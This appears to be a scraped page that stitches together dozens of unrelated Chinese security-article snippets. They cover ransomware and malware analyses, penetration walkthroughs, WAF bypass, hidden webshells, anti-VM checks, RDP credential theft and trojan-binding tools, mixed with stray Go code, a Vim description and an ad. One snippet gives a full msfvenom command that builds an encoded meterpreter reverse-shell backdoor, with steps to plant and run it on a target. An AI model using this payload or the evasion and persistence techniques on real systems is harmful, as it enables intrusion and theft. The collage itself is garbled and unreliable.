可将4个文件捆绑在一起,可定义释放的路径,多种高级运行方式,数据加密,不会被查出捆绑多个文件。
该黑客团伙投递的文件名大部分与用户常用软件有关, 火绒安全实验室目前收集到其伪装的部分文件名如下图所示:
好久没有正经的写渗透类型的技术文章了,一个是最近比较忙,另一个是前沿的技术文章没人看,花里胡哨的倒是挺多人围观的。
“食鼠猫”样本主要通过虚假色情播放器等流氓软件的捆绑安装进行传播,感染主机会被强制安装多款推广软件,病毒通过篡改浏览器快捷方式、Hosts文件等方式劫持用户电脑的导航网站流量,病毒导入根证书伪造数字签
该项目是用 Go 语言编写的免杀项目,可以将生成的 Shellcode 隐藏进图片中,然后让目标主机进行远程加载调用。
│ ├── caidao-20160620-www.maicaidao.com.7z
工具均从网络上收集,请大家尊重工具原作者,如需二次开发或用作商业用途,请联系工具原作者。
通过这个软件可以做到图片和木马程序绑定,点击之后图片正常显示,但同时会运行绑定的程序
前言 2021年7月2日,Sodinokibi(REvil)勒索病毒黑客组织疑似利用0day漏洞,通过Kaseya VSA发起大规模供应链攻击行动,此次事件影响范围广泛,目前瑞典最大链锁超市之一的Coop受此供应链勒索攻击事件影响被迫关闭全国约800多家商店服务。 笔者此前发布了相关的安全事件报告。 国内微步在线也对此次事件进行了相关分析报道,对Sodinokibi勒索病毒以及这次攻击不太了解的朋友,可以先参考之前的报告,事实上此次的供应链攻击影响还是蛮大的,攻击手法和攻击技术也是非常完整的,Kaseya
Date/time:2013年,这次的目标就是这台服务器权限,接下来这篇文章会写出在此次渗透中遇到的一些阻碍分析及最终拿到服务器权限的过程。其实这次的渗透应该来说还是挺简单的,都是常规的渗透思路,这次的渗透再次证明了细心、耐心和经验的重要性!
根据语言、解析漏洞、中间件、系统特性以及一些绕过WAF的方法:黑名单、大小写、ADS流、截断、空格、长度、htaccess等生存文件名字典。
这是早期的一则推特,眼尖的用户能注意到: 似乎扎克伯格的笔记本摄像头和麦克风插口都是用胶带蒙住的 Mark Zuckerberg为什么要把摄像头给封住了? 因为他也怕被黑,安全永远是相对的,更何
今年参加了几次攻防演练对抗赛,其它队伍依靠社工结合文件钓鱼得了不少分,自己之前并没有相关知识的积累,因此在这个方面吃了一些亏。
攻击者在获取服务器权限后,通常会用一些后门来维持权限。如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。
之前的文章中,都是本地环境没有做任何防护,如果网站安装了安全狗,就会对一些常见攻击进行防御,这篇文章就写一些对于网站安装了安全狗,咱们如何绕过它。发现挺有意思。
前言 近期,FireEye检测到了一种利用漏洞CVE-2017-0199的恶意OfficeRTF文档——本周早前FreeBuf也报道了这一漏洞,在无需启用Word宏的情况下,打开恶意RFT文档就可感染恶意程序。当用户打开嵌入了漏洞利用代码的恶意文档之后,这个漏洞将允许攻击者在目标设备中下载并执行一个包含PowerShell命令的Visual Basic脚本,而FireEye所发现的这个恶意Office文档正是利用了漏洞CVE-2017-0199来在受感染设备上下载并执行恶意Payload。 目前,Fir
权限维持是一门庞大的学问,当攻击者在入侵服务器获得主机权限后,往往会想尽办法隐藏其入侵途径以维持权限。权限维持的一般手段包括构造文件包含漏洞、构造远程任意代码执行漏洞、构造SQL注入点、利用系统自启动后门和隐藏 Webshell等。本文介绍如何利用ADS数据流隐藏Webshell,以及如何利用iGuard防御ADS。
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 服务器:win2003 中间件环境:iis6.0,sql server 2000 网站编写:asp 服务器ip:192.168.1.xx 开放端口:80 0x02 所用方式 Sql注入 IIS6.0 解析漏洞 一句话图片码 Sql server 2000 sa密码猜解 xp_
原文链接:https://paper.seebug.org/999/ 英文版本: https://paper.seebug.org/1000/
最近的恰饭文有点多,是时候该分享些东西了,等以后有空了再整理下其他WAF的绕过系列分享给大家,感谢大家的理解和支持,抱拳!
1、前言 前段时间Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客组织 Equation Group 对于Windows 远程漏洞 MS17-010 的利用工具,该漏洞影响范围之广,堪称杀器。可以看看官方通告。大伙们也忙的热火朝天~~于是想着把攻击环境移植到u盘里,然后比如去学校机房,网吧。 这里分享一下个人的移植过程,以及在使用攻击代码过程中遇到的问题,思路就是利用现成的神器pentestbox,向里添加攻击代码以及其运行需要的python环境。 2、环境移植过程 Pentest B
最近一段时间在面试病毒相关岗位,有的公司会电话、远程面试询问相关知识,有的则会直接发送病毒样本要求分析,写出分析报告。下面要分析的就是面试过程中的某个样本,整理成文,发表出来,供大家参考学习,一起进步!如有不当之处,也希望大佬批评指正,晚辈一定虚心受教。
Vim 是从 vi 发展出来的一个文本编辑器。代码补全、编译及错误跳转等方便编程的功能特别丰富,在程序员中被广泛使用,和 Emacs 并列成为类 Unix 系统用戶最喜欢的文本编辑器。Neovim 是一个基于 vim 源代码的重构项目。
作者:汪娇娇 时间:2017年8月15日 当时也是看了一本书《白帽子讲web安全》,简单的摘录然后做了个技术分享,文章不是很详细,建议大家结合着这本书看哈。 web安全 一、世界观安全 1、黑帽子、白
(1)如果安装了VMware Tools,则使用CreateToolhelp32Snapshot、Process32Next扫描进程列表,查看是否有VMwareService.exe、VMwareTray.exe和VMwareUser.exe (2)查看网卡地址是否以00:0C:29开头,或查看其它硬件版本 (3)探测内存痕迹,搜索含有VMware的字符串 (4)Red Pill反虚拟机技术->漏洞指令sidt,根据返回的idtr值不同,在多核处理器上无效 (5)No Pill技术->漏洞指令sldt,主机系统上的LDTR值为0,虚拟机中不为0 (6)查看查询I/O通信端口,监视in指令,第二个操作数为VX (7)查看str指令,主机和虚拟机中返回值不一样,str指令用来从任务寄存器中检索段选择子
之前的文章介绍了常见的XSS攻击、SQL注入、CSRF攻击等攻击方式和防御手段,没有看的去翻看之前的文章,这些都是针对代码或系统本身发生的攻击,另外还有一些攻击方式发生在网络层或者潜在的攻击漏洞在这里也总结一下。 DOS/DDOS攻击 DOS攻击不是说攻击DOS系统,或者通过DOS系统攻击。 DOS攻击全称为Denial of service,即拒绝服务,其主要攻击目的是使计算机硬件或网络宽带资源耗尽从而造成服务器无法提供正常服务,而DDOS攻击就是Distributed denial of serv
今天去给新一届的学生演示一次网站拿webshell到系统提权的过程,但不幸的是中间翻车了,老年人紧张得忘记了msf监听木马的指令,然后哆哆嗦嗦的在大家眼下,打开了笔记查看一下2333…所以更新一下文章,给自己一个教训QWQ。
kaiputenku大佬最近在挖洞的时候偶遇一枚XXE漏洞,身经百战的他经过一番爱恨纠缠,终将她顺利拿下~
大量带有恶意附件的电子邮件发送到南美洲与欧洲的企业。从 2022 年 8 月 12 日开始针对西班牙、葡萄牙、罗马尼亚和南美洲多个国家的企业进行发送,后续针对德国与阿根廷的企业发起了更大规模的攻击,迄今为止已经发送了超过 26000 封邮件。
中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式.
这里就按拓朴图中的来修改VMnet的配置,并恢复快照至初始状态,若还有问题可以跟着搭建文档来一遍
生成windows后门 1.首先生成后门 [root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe 2.进入Metasploit,执行以下操作 3.将我们的(lyshark.exe)拷贝到目标主机并运行 4.攻陷后常用查询命令 ps #查看进程 migrate
一种 Au3 远控木马变种样本分析 0x01 Au3 简介 AutoIt3 (简称 Au3)是一种能够在Windows GUI 或 DOS 上实现一系列自动化任务的脚本语言,其语法类似BASIC。 使用 Au3 开发的程序,能够具有以下功能: 模拟击键和鼠标移动操作; 对窗口和进程进行操作; 与所有标准的 Windows 控件进行交互。 编译的独立可执行文件无需安装任何运行环境。 可创建图形用户界面( GUI ); 支持 COM ; 支持正则表达式; 可直接调用外部 DLL 和 Windows API
当目标点开美图(恶意LNK快捷方式文件:confidential.jpg.lnk),使目标认为他正在打开图像(confidential.jpg),HTA dropper 隐藏在快捷方式文件中。LNK将执行HTA,HTA将依次执行并删除的DLL payload,并且用诱饵图片替换快捷方式(confidential.jpg)。过程如下:
// path package main import ( "fmt" "os" "path" "path/filepath" ) func main() { //Path操作 fmt.Println("Path操作-----------------") fmt.Println(path.Base("http://www.baidu.com/file/aa.jpg")) //aa.jpg fmt.Println(path.Clean("c:\\file//abc///aa.jpg"))
clrinject是一款可将C#,EXE或DLL程序集,注入另一个进程CLR Runtimes和AppDomain的工具。注入的程序集可访问injectee进程类的静态实例,从而影响其内部状态。
下午五点十分、手机开始狂收阿里云ECS实例告警,所有告警都提示机器CPU满载。
废话不多说,让我们直接开始吧~(好啦我承认今天的表情包是因为好想去迪斯尼,难道是上年纪了吗,嗯?)
【HA256】 :3504ec84a6efb00010064e3abb1d0ae5e38883ce0abbd7c1ad7245eeb3a05bcd
主站一般不想了,先搞子域名还是常用的办法子域名先跑一边,我这里使用的工具是oneforall,把收集到的子域名统统搞一遍,发现该子域名上所有的web程序都是使用的同一款cms(别问怎么知道的,问就是云悉查的),然后这套cms网上并没有啥可以利用的公开漏洞。
简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell的,利用宏执行VBS的,绕过权限限制完成危险命令执行的等等,都需要用到文件下载/上传姿势,一般说按照途径可以分为: 通过HTTP、FTP URL进行传输类 通过UNC进行传输类 通过磁盘写入类 而payload执行则具体可以分为有文件类和无文件类,具体分的话就是内存执行、本地缓存、磁盘文件 通过HTTP下载
📷 简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell的,利用宏执行VBS的,绕过权限限制完成危险命令执行的等等,都需要用到文件下载/上传姿势,一般说按照途径可以分为: 通过HTTP、FTP URL进行传输类 通过UNC进行传输类 通过磁盘写入类 而payload执行则具体可以分为有文件类和无文件类,具体分的话就是内存执行、本地缓存、磁盘文件下面我们
com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成SSRF&RCE。
在之前几节介绍了各种注入方法,但是这些方法存在一些缺陷——对.net程序注入无效。(转载请指明出处)
在线下载小工具:https://support.modelamerican.com/downloads/Utilities/Windows/ResKit/
当我们拿到某台机器时就可以用以下几个工具来窃取管理员使用mstsc.exe远程连接其他机器时所输入的RDP用户密码等信息,其原理是将特定的恶意dll注入到mstsc.exe实现窃取RDP凭据;实战中我们还可以通过观察和分析窃取到的RDP凭据是否存在规律、通用性的可能,如果存在则可以生成一个高效字典来对内网其他机器进行爆破......等等场景。
tesseract.exe下载地址:https://digi.bib.uni-mannheim.de/tesseract/
最近,一种利用Powershell的挖矿病毒在企业网络中频繁爆发,该病毒其利用了WMI+Powershell方式进行无文件攻击,并长驻内存进行挖矿。
领取专属 10元无门槛券
手把手带您无忧上云